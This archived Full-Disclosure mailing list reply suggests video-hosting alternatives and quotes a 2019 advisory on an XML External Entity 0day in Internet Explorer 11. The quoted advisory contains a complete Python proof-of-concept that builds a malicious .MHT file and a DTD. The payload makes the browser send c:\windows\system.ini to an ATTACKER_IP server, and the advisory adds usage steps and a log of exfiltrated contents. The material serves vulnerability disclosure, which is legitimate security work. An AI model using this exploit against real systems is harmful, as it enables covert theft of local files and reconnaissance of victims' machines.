| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <b3fde8df-02df-35fb-9bff-c9f626b869ac@riseup.net>
Date: Sat, 13 Apr 2019 21:07:00 +0000
From: bo0od <bo0od@...eup.net>
To: fulldisclosure@...lists.org
Subject: Re: [FD] Microsoft Internet Explorer v11 / XML External Entity
Injection 0day
have your own videos either on one of the PeerTubes instances or have
your own instance.
https://joinpeertube.org/en/
other good alternative would be:
https://mediagoblin.org/pages/tour.html
Enjoy!
hyp3rlinx:
> vimeo removed my account for no good reason so new POC url is included.
>
> [+] Credits: John Page (aka hyp3rlinx)
> [+] Website: hyp3rlinx.altervista.org
> [+] Source:
> http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-v11-XML-EXTERNAL-ENTITY-INJECTION-0DAY.txt
> [+] ISR: ApparitionSec
>
>
> [Vendor]
> www.microsoft.com
>
>
> [Product]
> Microsoft Internet Explorer v11
> (latest version)
>
> Internet Explorer is a series of graphical web browsers developed by
> Microsoft and included in the Microsoft Windows line of operating systems,
> starting in 1995.
>
>
> [Vulnerability Type]
> XML External Entity Injection
>
>
>
> [CVE Reference]
> N/A
>
>
>
> [Security Issue]
> Internet Explorer is vulnerable to XML External Entity attack if a user
> opens a specially crafted .MHT file locally.
>
> This can allow remote attackers to potentially exfiltrate Local files and
> conduct remote reconnaissance on locally installed
> Program version information. Example, a request for "c:\Python27\NEWS.txt"
> can return version information for that program.
>
> Upon opening the malicious ".MHT" file locally it should launch Internet
> Explorer. Afterwards, user interactions like duplicate tab "Ctrl+K"
> and other interactions like right click "Print Preview" or "Print" commands
> on the web-page may also trigger the XXE vulnerability.
>
> However, a simple call to the window.print() Javascript function should do
> the trick without requiring any user interaction with the webpage.
> Importantly, if files are downloaded from the web in a compressed archive
> and opened using certain archive utilities MOTW may not work as advertised.
>
> Typically, when instantiating ActiveX Objects like "Microsoft.XMLHTTP"
> users will get a security warning bar in IE and be prompted
> to activate blocked content. However, when opening a specially crafted .MHT
> file using malicious <xml> markup tags the user will get no such
> active content or security bar warnings.
>
> e.g.
>
> C:\sec>python -m SimpleHTTPServer
> Serving HTTP on 0.0.0.0 port 8000 ...
> 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET /datatears.xml HTTP/1.1" 200 -
> 127.0.0.1 - - [10/Apr/2019 20:56:28] "GET
> /?;%20for%2016-bit%20app%20support[386Enh]woafont=dosapp.fonEGA80WOA.FON=EGA80WOA.FONEGA40WOA.FON=EGA40WOA.FONCGA80WOA.FON=CGA80WOA.FONCGA40WOA.FON=CGA40WOA.FON[drivers]wave=mmdrv.dlltimer=timer.drv[mci]
> HTTP/1.1" 200 -
>
>
> Tested successfully in latest Internet Explorer Browser v11 with latest
> security patches on Win7/10 and Server 2012 R2.
>
>
>
> [POC/Video URL]
> https://www.youtube.com/watch?v=fbLNbCjgJeY
>
>
>
> [Exploit/POC]
> POC to exfil Windows "system.ini" file.
> Note: Edit attacker server IP in the script to suit your needs.
>
> 1) Use below script to create the "datatears.xml" XML and XXE embedded
> "msie-xxe-0day.mht" MHT file.
>
> 2) python -m SimpleHTTPServer
>
> 3) Place the generated "datatears.xml" in Python server web-root.
>
> 4) Open the generated "msie-xxe-0day.mht" file, watch your files be
> exfiltrated.
>
>
> #Microsoft Internet Explorer XXE 0day
> #Creates malicious XXE .MHT and XML files
> #Open the MHT file in MSIE locally, should exfil system.ini
> #By hyp3rlinx
> #ApparitionSec
>
> ATTACKER_IP="localhost"
> PORT="8000"
>
> mht_file=(
> 'From:\n'
> 'Subject:\n'
> 'Date:\n'
> 'MIME-Version: 1.0\n'
> 'Content-Type: multipart/related; type="text/html";\n'
> '\tboundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001"\n'
> 'This is a multi-part message in MIME format.\n\n\n'
>
> '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001\n'
> 'Content-Type: text/html; charset="UTF-8"\n'
> 'Content-Location: main.htm\n\n'
>
> '<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "
> http://www.w3.org/TR/html4/transitional.dtd">\n'
> '<html>\n'
> '<head>\n'
> '<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n'
> '<title>MSIE XXE 0day</title>\n'
> '</head>\n'
> '<body>\n'
> '<xml>\n'
> '<?xml version="1.0" encoding="utf-8"?>\n'
> '<!DOCTYPE r [\n'
> '<!ELEMENT r ANY >\n'
> '<!ENTITY % sp SYSTEM "http://
> '+str(ATTACKER_IP)+":"+PORT+'/datatears.xml">\n'
> '%sp;\n'
> '%param1;\n'
> ']>\n'
> '<r>&exfil;</r>\n'
> '<r>&exfil;</r>\n'
> '<r>&exfil;</r>\n'
> '<r>&exfil;</r>\n'
> '</xml>\n'
> '<script>window.print();</script>\n'
> '<table cellpadding="0" cellspacing="0" border="0">\n'
> '<tr>\n'
> '<td class="contentcell-width">\n'
> '<h1>MSIE XML External Entity 0day PoC.</h1>\n'
> '<h3>Discovery: hyp3rlinx</h3>\n'
> '<h3>ApparitionSec</h3>\n'
> '</td>\n'
> '</tr>\n'
> '</table>\n'
> '</body>\n'
> '</html>\n\n\n'
>
> '--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_00000001--'
> )
>
> xml_file=(
> '<!ENTITY % data SYSTEM "c:\windows\system.ini">\n'
> '<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://
> '+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'
> '<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">\n'
> '<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'http://
> '+str(ATTACKER_IP)+":"+PORT+'/?%data;\'>">\n'
> )
>
> def mk_msie_0day_filez(f,p):
> f=open(f,"wb")
> f.write(p)
> f.close()
>
>
> if __name__ == "__main__":
> mk_msie_0day_filez("msie-xxe-0day.mht",mht_file)
> mk_msie_0day_filez("datatears.xml",xml_file)
> print "Microsoft Internet Explorer XML External Entity 0day PoC."
> print "Files msie-xxe-0day.mht and datatears.xml Created!."
> print "Discovery: Hyp3rlinx / Apparition Security"
>
>
>
>
> [Network Access]
> Remote
>
>
>
> [Severity]
> High
>
>
>
> [Disclosure Timeline]
> Vendor Notification: March 27, 2019
> Vendor acknowledgement: March 27, 2019
> Case Opened: March 28, 2019
> MSRC reponse April 10, 2019: "We determined that a fix for this issue will
> be considered in a future version of this product or service.
> At this time, we will not be providing ongoing updates of the status of the
> fix for this issue, and we have closed this case."
> April 10, 2019 : Public Disclosure
>
>
>
> [+] Disclaimer
> The information contained within this advisory is supplied "as-is" with no
> warranties or guarantees of fitness of use or otherwise.
> Permission is hereby granted for the redistribution of this advisory,
> provided that it is not altered except by reformatting it, and
> that due credit is given. Permission is explicitly given for insertion in
> vulnerability databases and similar, provided that due credit
> is given to the author. The author is not responsible for any misuse of the
> information contained herein and accepts no responsibility
> for any damage caused by the use or misuse of this information. The author
> prohibits any malicious use of security related information
> or exploits by the author or elsewhere. All content (c).
>
> hyp3rlinx
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists